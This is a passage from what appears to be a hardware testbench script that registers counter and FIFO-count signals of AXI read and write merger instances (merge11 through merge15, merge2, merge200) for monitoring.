counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge12.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge12.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge13.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge13.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge14.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge14.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge15.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge15.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge15.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge15.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge15.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge15.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge15.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge15.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge15.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge15.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge15.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge15.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge15.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge15.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge15.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge15.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge15.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge15.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge15.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge15.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge15.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge2.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge2.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge2.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge2.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge2.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge2.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge2.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge2.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge2.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge2.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge2.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge2.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge2.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge2.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge2.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge2.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge2.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge2.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge2.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge2.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge2.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge200.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge200.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge200.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge200.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge200.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge200.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge200.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge200.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge200.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge200.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge200.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge200.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge200.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge200.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge200.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge200.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge200.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge200.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge200.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge200.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge200.axi_wr_4_merger.d_win_fifo.count")
